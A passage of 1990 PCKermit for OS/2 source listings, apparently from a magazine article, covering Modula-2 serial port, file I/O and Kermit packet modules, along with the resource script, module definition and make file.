ELSE + RETURN Success; + END; + END; + END SendChar; + + +BEGIN (* module initialization *) + (* nothing open yet *) + FOR pn := 0 TO 3 DO + Handle[pn] := 0; + BufStart[pn] := NIL; + BufLimit[pn] := NIL; + BufIn[pn] := NIL; + BufOut[pn] := NIL; + BufSize[pn] := 0; + END; +END CommPort. + +[LISTING THIRTEEN] + +IMPLEMENTATION MODULE Files; (* File I/O for Kermit *) + + FROM FileSystem IMPORT + File, Response, Delete, Lookup, Close, ReadNBytes, WriteNBytes; + + FROM Strings IMPORT + Append; + + FROM Conversions IMPORT + CardToString; + + FROM SYSTEM IMPORT + ADR, SIZE; + + + TYPE + buffer = ARRAY [1..512] OF CHAR; + + + VAR + ext : CARDINAL; (* new file extensions to avoid name conflict *) + inBuf, outBuf : buffer; + inP, outP : CARDINAL; (* buffer pointers *) + read, written : CARDINAL; (* number of bytes read or written *) + (* by ReadNBytes or WriteNBytes *) + + + PROCEDURE Open (VAR f : File; name : ARRAY OF CHAR) : Status; + (* opens an existing file for reading, returns status *) + BEGIN + Lookup (f, name, FALSE); + IF f.res = done THEN + inP := 0; read := 0; + RETURN Done; + ELSE + RETURN Error; + END; + END Open; + + + PROCEDURE Create (VAR f : File; name : ARRAY OF CHAR) : Status; + (* creates a new file for writing, returns status *) + + VAR + ch : CHAR; + str : ARRAY [0..3] OF CHAR; + i : CARDINAL; + b : BOOLEAN; + + BEGIN + LOOP + Lookup (f, name, FALSE); (* check to see if file exists *) + IF f.res = done THEN + Close (f); + (* Filename Clash: Change file name *) + IF ext > 99 THEN (* out of new names... *) + RETURN Error; + END; + i := 0; + WHILE (name[i] # 0C) AND (name[i] # '.') DO + INC (i); (* scan for end of filename *) + END; + name[i] := '.'; name[i + 1] := 'K'; name[i + 2] := 0C; + i := 0; + CardToString (ext, 1, str, i, b); + Append (name, str); (* append new extension *) + INC (ext); + ELSE + EXIT; + END; + END; + Lookup (f, name, TRUE); + IF f.res = done THEN + outP := 0; + RETURN Done; + ELSE + RETURN Error; + END; + END Create; + + + PROCEDURE CloseFile (VAR f : File; Which : FileType) : Status; + (* closes a file after reading or writing *) + BEGIN + written := outP; + IF (Which = Output) AND (outP > 0) THEN + WriteNBytes (f, ADR (outBuf), outP); + written := f.count; + END; + Close (f); + IF (written = outP) AND (f.res = done) THEN + RETURN Done; + ELSE + RETURN Error; + END; + END CloseFile; + + + PROCEDURE Get (VAR f : File; VAR ch : CHAR) : Status; + (* Reads one character from the file, returns status *) + BEGIN + IF inP = read THEN + ReadNBytes (f, ADR (inBuf), SIZE (inBuf)); + read := f.count; + inP := 0; + END; + IF read = 0 THEN + RETURN EOF; + ELSE + INC (inP); + ch := inBuf[inP]; + RETURN Done; + END; + END Get; + + + PROCEDURE Put (ch : CHAR); + (* Writes one character to the file buffer *) + BEGIN + INC (outP); + outBuf[outP] := ch; + END Put; + + + PROCEDURE DoWrite (VAR f : File) : Status; + (* Writes buffer to disk only if nearly full *) + BEGIN + IF outP < 400 THEN (* still room in buffer *) + RETURN Done; + ELSE + WriteNBytes (f, ADR (outBuf), outP); + written := f.count; + IF (written = outP) AND (f.res = done) THEN + outP := 0; + RETURN Done; + ELSE + RETURN Error; + END; + END; + END DoWrite; + +BEGIN (* module initialization *) + ext := 0; +END Files. + +[LISTING FOURTEEN] + +DEFINITION MODULE KH; + +CONST + ID_OK = 25; + + PARITY_OFF = 150; + ID_NONE = 152; + ID_ODD = 151; + ID_EVEN = 150; + + STOP_OFF = 140; + ID_STOP2 = 142; + ID_STOP1 = 141; + + DATA_OFF = 130; + ID_DATA8 = 138; + ID_DATA7 = 137; + + BAUD_OFF = 120; + ID_B19K2 = 128; + ID_B9600 = 127; + ID_B4800 = 126; + ID_B2400 = 125; + ID_B1200 = 124; + ID_B600 = 123; + ID_B300 = 122; + ID_B150 = 121; + ID_B110 = 120; + + COM_OFF = 100; + ID_COM2 = 101; + ID_COM1 = 100; + + IDM_C2 = 24; + IDM_C1 = 23; + IDM_AMBER = 22; + IDM_GREEN = 21; + IDM_WHITE = 20; + IDM_COLORS = 19; + IDM_DIREND = 18; + ID_DIRPATH = 17; + ID_SENDFN = 16; + IDM_DIRPATH = 15; + IDM_SENDFN = 14; + IDM_TERMHELP = 13; + IDM_HELPMENU = 12; + IDM_ABOUT = 11; + IDM_PARITY = 10; + IDM_STOPBITS = 9; + IDM_DATABITS = 8; + IDM_BAUDRATE = 7; + IDM_COMPORT = 6; + IDM_QUIT = 5; + IDM_REC = 4; + IDM_SEND = 3; + IDM_CONNECT = 2; + IDM_DIR = 1; + IDM_OPTIONS = 52; + IDM_FILE = 51; + IDM_KERMIT = 50; + +END KH. + +[LISTING FIFTEEN] + +IMPLEMENTATION MODULE KH; +END KH. + +[LISTING SIXTEEN] + +#define IDM_KERMIT 50 +#define IDM_FILE 51 +#define IDM_OPTIONS 52 +#define IDM_HELP 0 +#define IDM_DIR 1 +#define IDM_CONNECT 2 +#define IDM_SEND 3 +#define IDM_REC 4 +#define IDM_QUIT 5 +#define IDM_COMPORT 6 +#define IDM_BAUDRATE 7 +#define IDM_DATABITS 8 +#define IDM_STOPBITS 9 +#define IDM_PARITY 10 +#define IDM_ABOUT 11 +#define IDM_HELPMENU 12 +#define IDM_TERMHELP 13 +#define IDM_SENDFN 14 +#define IDM_DIRPATH 15 +#define ID_SENDFN 16 +#define ID_DIRPATH 17 +#define IDM_DIREND 18 +#define IDM_COLORS 19 +#define IDM_WHITE 20 +#define IDM_GREEN 21 +#define IDM_AMBER 22 +#define IDM_C1 23 +#define IDM_C2 24 +#define ID_OK 25 +#define ID_COM1 100 +#define ID_COM2 101 +#define ID_B110 120 +#define ID_B150 121 +#define ID_B300 122 +#define ID_B600 123 +#define ID_B1200 124 +#define ID_B2400 125 +#define ID_B4800 126 +#define ID_B9600 127 +#define ID_B19K2 128 +#define ID_DATA7 137 +#define ID_DATA8 138 +#define ID_STOP1 141 +#define ID_STOP2 142 +#define ID_EVEN 150 +#define ID_ODD 151 +#define ID_NONE 152 + +[LISTING SEVENTEEN] + +IMPLEMENTATION MODULE DataLink; (* Sends and Receives Packets for PCKermit *) + + FROM ElapsedTime IMPORT + StartTime, GetTime; + + FROM Screen IMPORT + ClrScr, WriteString, WriteLn; + + FROM PMWIN IMPORT + MPARAM, WinPostMsg; + + FROM Shell IMPORT + ChildFrameWindow, comport; + + FROM CommPort IMPORT + CommStatus, GetChar, SendChar; + + FROM PAD IMPORT + PacketType, yourNPAD, yourPADC, yourEOL; + + FROM KH IMPORT + COM_OFF; + + FROM SYSTEM IMPORT + BYTE; + + IMPORT ASCII; + + + CONST + MAXtime = 100; (* hundredths of a second -- i.e., one second *) + MAXsohtrys = 100; + DL_BadCS = 1; + DL_NoSOH = 2; + + + TYPE + SMALLSET = SET OF [0..7]; (* BYTE *) + + VAR + ch : CHAR; + status : CommStatus; + MP1, MP2 : MPARAM; + + + PROCEDURE Delay (t : CARDINAL); + (* delay time in milliseconds *) + + VAR + tmp : LONGINT; + + BEGIN + tmp := t DIV 10; + StartTime; + WHILE GetTime() < tmp DO + END; + END Delay; + + + PROCEDURE ByteAnd (a, b : BYTE) : BYTE; + BEGIN + RETURN BYTE (SMALLSET (a) * SMALLSET (b)); + END ByteAnd; + + + PROCEDURE Char (c : INTEGER) : CHAR; + (* converts a number 0-95 into a printable character *) + BEGIN + RETURN (CHR (CARDINAL (ABS (c) + 32))); + END Char; + + + PROCEDURE UnChar (c : CHAR) : INTEGER; + (* converts a character into its corresponding number *) + BEGIN + RETURN (ABS (INTEGER (ORD (c)) - 32)); + END UnChar; + + + PROCEDURE FlushUART; + (* ensure no characters left in UART holding registers *) + BEGIN + Delay (500); + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL status = NoCharacter; + END FlushUART; + + + PROCEDURE SendPacket (s : PacketType); + (* Adds SOH and CheckSum to packet *) + + VAR + i : CARDINAL; + checksum : INTEGER; + + BEGIN + Delay (10); (* give host a chance to catch its breath *) + FOR i := 1 TO yourNPAD DO + status := SendChar (comport - COM_OFF, yourPADC, FALSE); + END; + status := SendChar (comport - COM_OFF, ASCII.soh, FALSE); + i := 1; + checksum := 0; + WHILE s[i] # 0C DO + INC (checksum, ORD (s[i])); + status := SendChar (comport - COM_OFF, s[i], FALSE); + INC (i); + END; + checksum := checksum + (INTEGER (BITSET (checksum) * {7, 6}) DIV 64); + checksum := INTEGER (BITSET (checksum) * {5, 4, 3, 2, 1, 0}); + status := SendChar (comport - COM_OFF, Char (checksum), FALSE); + IF yourEOL # 0C THEN + status := SendChar (comport - COM_OFF, yourEOL, FALSE); + END; + END SendPacket; + + + PROCEDURE ReceivePacket (VAR r : PacketType) : BOOLEAN; + (* strips SOH and checksum -- returns status: TRUE = good packet *) + (* received; FALSE = timed out waiting for packet or checksum error *) + + VAR + sohtrys : INTEGER; + i, len : INTEGER; + ch : CHAR; + checksum : INTEGER; + mycheck, yourcheck : CHAR; + + BEGIN + sohtrys := MAXsohtrys; + REPEAT + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); (* mask off MSB *) + (* skip over up to MAXsohtrys padding characters, *) + (* but allow only MAXsohtrys/10 timeouts *) + IF status = Success THEN + DEC (sohtrys); + ELSE + DEC (sohtrys, 10); + END; + UNTIL (ch = ASCII.soh) OR (sohtrys <= 0); + + IF ch = ASCII.soh THEN + (* receive rest of packet *) + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); + len := UnChar (ch); + r[1] := ch; + checksum := ORD (ch); + i := 2; (* on to second character in packet -- after LEN *) + REPEAT + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); + r[i] := ch; INC (i); + INC (checksum, (ORD (ch))); + UNTIL (i > len); + (* get checksum character *) + StartTime; + REPEAT + status := GetChar (comport - COM_OFF, ch); + UNTIL (status = Success) OR (GetTime() > MAXtime); + ch := CHAR (ByteAnd (ch, 177C)); + yourcheck := ch; + r[i] := 0C; + checksum := checksum + + (INTEGER (BITSET (checksum) * {7, 6}) DIV 64); + checksum := INTEGER (BITSET (checksum) * {5, 4, 3, 2, 1, 0}); + mycheck := Char (checksum); + IF mycheck = yourcheck THEN (* checksum OK *) + RETURN TRUE; + ELSE (* ERROR!!! *) + MP1.W1 := DL_BadCS; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_DL, MP1, MP2); + RETURN FALSE; + END; + ELSE + MP1.W1 := DL_NoSOH; MP1.W2 := 0; + MP2.L := 0; + WinPostMsg (ChildFrameWindow, WM_DL, MP1, MP2); + RETURN FALSE; + END; + END ReceivePacket; + + + PROCEDURE DoDLMsg (mp1, mp2 [VALUE] : MPARAM); + (* Process DataLink Messages *) + BEGIN + CASE CARDINAL (mp1.W1) OF + DL_BadCS: + WriteString ("Bad Checksum"); WriteLn; + | DL_NoSOH: + WriteString ("No SOH"); WriteLn; + ELSE + (* Do Nothing *) + END; + END DoDLMsg; + +END DataLink. + +[LISTING EIGHTEEN] + +#include +#include "pckermit.h" + +ICON IDM_KERMIT pckermit.ico + +MENU IDM_KERMIT + BEGIN + SUBMENU "~File", IDM_FILE + BEGIN + MENUITEM "~Directory...", IDM_DIR + MENUITEM "~Connect\t^C", IDM_CONNECT + MENUITEM "~Send...\t^S", IDM_SEND + MENUITEM "~Receive...\t^R", IDM_REC + MENUITEM SEPARATOR + MENUITEM "E~xit\t^X", IDM_QUIT + MENUITEM "A~bout PCKermit...", IDM_ABOUT + END + + SUBMENU "~Options", IDM_OPTIONS + BEGIN + MENUITEM "~COM port...", IDM_COMPORT + MENUITEM "~Baud rate...", IDM_BAUDRATE + MENUITEM "~Data bits...", IDM_DATABITS + MENUITEM "~Stop bits...", IDM_STOPBITS + MENUITEM "~Parity bits...", IDM_PARITY + END + + SUBMENU "~Colors", IDM_COLORS + BEGIN + MENUITEM "~White Mono", IDM_WHITE + MENUITEM "~Green Mono", IDM_GREEN + MENUITEM "~Amber Mono", IDM_AMBER + MENUITEM "Full Color ~1", IDM_C1 + MENUITEM "Full Color ~2", IDM_C2 + END + + MENUITEM "F1=Help", IDM_HELP, MIS_HELP | MIS_BUTTONSEPARATOR + END + +ACCELTABLE IDM_KERMIT + BEGIN + "^C", IDM_CONNECT + "^S", IDM_SEND + "^R", IDM_REC + "^X", IDM_QUIT + END + +DLGTEMPLATE IDM_COMPORT LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_COMPORT, 129, 91, 143, 54, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + CONTROL "Select COM Port", IDM_COMPORT, 10, 9, 83, 38, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "COM1", ID_COM1, 30, 25, 43, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "COM2", ID_COM2, 30, 15, 39, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 101, 10, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_BAUDRATE LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_BAUDRATE, 131, 54, 142, 115, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + CONTROL "Select Baud Rate", IDM_BAUDRATE, 8, 6, 85, 107, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "110 Baud", ID_B110, 20, 90, 62, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "150 Baud", ID_B150, 20, 80, 57, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "300 Baud", ID_B300, 20, 70, 58, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "600 Baud", ID_B600, 20, 60, 54, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "1200 Baud", ID_B1200, 20, 50, 59, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "2400 Baud", ID_B2400, 20, 40, 63, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "4800 Baud", ID_B4800, 20, 30, 62, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "9600 Baud", ID_B9600, 20, 20, 59, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "19,200 Baud", ID_B19K2, 20, 10, 69, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 100, 8, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_DATABITS LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_DATABITS, 137, 80, 140, 56, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Select Data Bits", IDM_DATABITS, 8, 11, 80, 36, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "7 Data Bits", ID_DATA7, 15, 25, 67, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "8 Data Bits", ID_DATA8, 15, 15, 64, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 96, 12, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_STOPBITS LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_STOPBITS, 139, 92, 140, 43, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Select Stop Bits", IDM_STOPBITS, 9, 6, 80, 32, + WC_STATIC, SS_GROUPBOX | WS_VISIBLE + CONTROL "1 Stop Bit", ID_STOP1, 20, 20, 57, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "2 Stop Bits", ID_STOP2, 20, 10, 60, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 96, 8, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_PARITY LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_PARITY, 138, 84, 134, 57, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Select Parity", IDM_PARITY, 12, 6, 64, 46, WC_STATIC, + SS_GROUPBOX | WS_VISIBLE + CONTROL "Even", ID_EVEN, 25, 30, 40, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_GROUP | WS_TABSTOP | WS_VISIBLE + CONTROL "Odd", ID_ODD, 25, 20, 38, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "None", ID_NONE, 25, 10, 40, 10, WC_BUTTON, + BS_AUTORADIOBUTTON | WS_TABSTOP | WS_VISIBLE + CONTROL "OK", ID_OK, 88, 8, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_GROUP | WS_TABSTOP | WS_VISIBLE + END +END + + +DLGTEMPLATE IDM_ABOUT LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_ABOUT, 93, 74, 229, 88, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + ICON IDM_KERMIT -1, 12, 64, 22, 16 + CONTROL "PCKermit for OS/2", 256, 67, 70, 82, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Copyright (c) 1990 by Brian R. Anderson", 257, 27, 30, 172, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Microcomputer to Mainframe Communications", 259, 13, 50, 199, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL " OK ", 258, 88, 10, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_HELPMENU LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_HELPMENU, 83, 45, 224, 125, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + ICON IDM_KERMIT -1, 14, 99, 21, 16 + CONTROL "PCKermit Help Menu", 256, 64, 106, 91, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "set communications Options .................. Alt, O", + 258, 10, 80, 201, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Connect to Host ................................... Alt, F; C", + 259, 10, 70, 204, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Directory .............................................. Alt, F; D", + 260, 10, 60, 207, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Send a File .......................................... Alt, F; S", + 261, 10, 50, 207, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Receive a File ...................................... Alt, F; R", + 262, 10, 40, 209, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Exit ...................................................... Alt, F; X", + 263, 10, 30, 205, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "OK", 264, 83, 9, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + WS_TABSTOP | WS_VISIBLE | BS_DEFAULT + END +END + +DLGTEMPLATE IDM_TERMHELP LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_TERMHELP, 81, 20, 238, 177, FS_NOBYTEALIGN | + FS_DLGBORDER | WS_VISIBLE | WS_CLIPSIBLINGS | WS_SAVEBITS + BEGIN + CONTROL "^E = Echo mode", 256, 10, 160, 72, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^L = Local echo mode", 257, 10, 150, 97, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^T = Terminal Mode (no echo)", 258, 10, 140, 131, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^N = Newline mode ( --> )", 259, 10, 130, 165, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "^O = Newline mode OFF", 260, 10, 120, 109, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Televideo TVI950 / IBM 7171 Terminal Emulation", 261, 10, 100, 217, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Sh-F1 - Sh-F12 = PF1 - PF12", 262, 10, 90, 135, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Home = Clear", 263, 10, 80, 119, 8, WC_STATIC, + SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "PgDn = Page Down (as used in PROFS)", + 264, 10, 70, 228, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "PgUp = Page Up (as used in PROFS)", + 265, 10, 60, 227, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "Insert = Insert (Enter to Clear)", 266, 10, 40, 221, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Delete = Delete", 267, 10, 30, 199, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Control-G = Reset (rewrites the screen)", + 268, 10, 20, 222, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "Cursor Keys (i.e., Up, Down, Left, Right) all work.", + 269, 10, 10, 220, 8, WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | + WS_GROUP | WS_VISIBLE + CONTROL "OK", 270, 193, 158, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_TABSTOP | WS_VISIBLE + CONTROL "End = End (as used in PROFS)", 271, 10, 50, 209, 8, + WC_STATIC, SS_TEXT | DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + END +END + + +DLGTEMPLATE IDM_SENDFN LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_SENDFN, 113, 90, 202, 60, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Send File", 256, 4, 4, 195, 24, WC_STATIC, SS_GROUPBOX | + WS_GROUP | WS_VISIBLE + CONTROL "Enter filename:", 257, 13, 11, 69, 8, WC_STATIC, SS_TEXT | + DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + ICON IDM_KERMIT -1, 15, 38, 22, 16 + CONTROL "PCKermit for OS/2", 259, 59, 45, 82, 8, WC_STATIC, SS_TEXT | + DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "OK", 260, 154, 36, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + WS_TABSTOP | WS_VISIBLE | BS_DEFAULT + CONTROL "", ID_SENDFN, 89, 10, 98, 8, WC_ENTRYFIELD, ES_LEFT | + ES_MARGIN | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_DIRPATH LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_DIRPATH, 83, 95, 242, 46, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Directory", 256, 7, 5, 227, 24, WC_STATIC, SS_GROUPBOX | + WS_GROUP | WS_VISIBLE + CONTROL "Path:", 257, 28, 11, 26, 8, WC_STATIC, SS_TEXT | DT_LEFT | + DT_TOP | WS_GROUP | WS_VISIBLE + CONTROL "OK", 258, 185, 31, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + WS_TABSTOP | WS_VISIBLE | BS_DEFAULT + CONTROL "*.*", ID_DIRPATH, 57, 11, 166, 8, WC_ENTRYFIELD, ES_LEFT | + ES_AUTOSCROLL | ES_MARGIN | WS_TABSTOP | WS_VISIBLE + END +END + +DLGTEMPLATE IDM_DIREND LOADONCALL MOVEABLE DISCARDABLE +BEGIN + DIALOG "", IDM_DIREND, 149, 18, 101, 27, FS_NOBYTEALIGN | FS_DLGBORDER | + WS_VISIBLE | WS_SAVEBITS + BEGIN + CONTROL "Cancel", 256, 30, 2, 38, 12, WC_BUTTON, BS_PUSHBUTTON | + BS_DEFAULT | WS_TABSTOP | WS_VISIBLE + CONTROL "Directory Complete", 257, 9, 16, 84, 8, WC_STATIC, SS_TEXT | + DT_LEFT | DT_TOP | WS_GROUP | WS_VISIBLE + END +END + +[LISTING NINETEEN] + +NAME PCKermit WINDOWAPI +DESCRIPTION 'PCKermit: (c) Brian R. Anderson, 1990' +HEAPSIZE 16384 +STACKSIZE 8192 +PROTMODE +EXETYPE OS2 +CODE LOADONCALL EXECUTEREAD NOIOPL NONCONFORMING +DATA LOADONCALL READWRITE MULTIPLE NONSHARED NOIOPL +EXPORTS + WindowProc + ChildWindowProc + ComDlgProc + BaudDlgProc + DataDlgProc + StopDlgProc + ParityDlgProc + AboutDlgProc + SendFNDlgProc + PathDlgProc + DirEndDlgProc + HelpDlgProc + +[FILE PCKERMIT] + +KH.SYM: KH.DEF + M2 KH.DEF/OUT:KH.SYM +KH.OBJ: KH.MOD KH.SYM + M2 KH.MOD/OUT:KH.OBJ +SHELL.SYM: SHELL.DEF + M2 SHELL.DEF/OUT:SHELL.SYM +TERM.SYM: TERM.DEF + M2 TERM.DEF/OUT:TERM.SYM +PAD.SYM: PAD.DEF + M2 PAD.DEF/OUT:PAD.SYM +DATALINK.SYM: DATALINK.DEF PAD.SYM + M2 DATALINK.DEF/OUT:DATALINK.SYM +COMMPORT.SYM: COMMPORT.DEF + M2 COMMPORT.DEF/OUT:COMMPORT.SYM +FILES.SYM: FILES.DEF + M2 FILES.DEF/OUT:FILES.SYM +pckermit.OBJ: pckermit.MOD SHELL.SYM KH.SYM + M2 pckermit.MOD/OUT:pckermit.OBJ +SCREEN.SYM: SCREEN.DEF + M2 SCREEN.DEF/OUT:SCREEN.SYM +SCREEN.OBJ: SCREEN.MOD KH.SYM SCREEN.SYM + M2 SCREEN.MOD/OUT:SCREEN.OBJ +COMMPORT.OBJ: COMMPORT.MOD COMMPORT.SYM + M2 COMMPORT.MOD/OUT:COMMPORT.OBJ +FILES.OBJ: FILES.MOD FILES.SYM + M2 FILES.MOD/OUT:FILES.OBJ +SHELL.OBJ: SHELL.MOD COMMPORT.SYM KH.SYM SCREEN.SYM DATALINK.SYM PAD.SYM - +TERM.SYM SHELL.SYM + M2 SHELL.MOD/OUT:SHELL.OBJ +TERM.OBJ: TERM.MOD COMMPORT.SYM KH.SYM SHELL.SYM SCREEN.SYM TERM.SYM + M2 TERM.MOD/OUT:TERM.OBJ +PAD.OBJ: PAD.MOD DATALINK.SYM KH.SYM SHELL.SYM FILES.SYM SCREEN.SYM PAD.SYM + M2 PAD.MOD/OUT:PAD.OBJ +DATALINK.OBJ: DATALINK.MOD KH.SYM PAD.SYM COMMPORT.SYM SHELL.SYM SCREEN.SYM - +DATALINK.SYM + M2 DATALINK.MOD/OUT:DATALINK.OBJ +pckermit.res: pckermit.rc pckermit.h pckermit.ico + rc -r pckermit.rc +pckermit.EXE: KH.OBJ pckermit.OBJ SCREEN.OBJ COMMPORT.OBJ FILES.OBJ SHELL.OBJ - +TERM.OBJ PAD.OBJ DATALINK.OBJ + LINK @pckermit.LNK + rc pckermit.res +pckermit.exe: pckermit.res + rc pckermit.res + +[ FILE PCKERMIT.LNK] + +KH.OBJ+ +pckermit.OBJ+ +SCREEN.OBJ+ 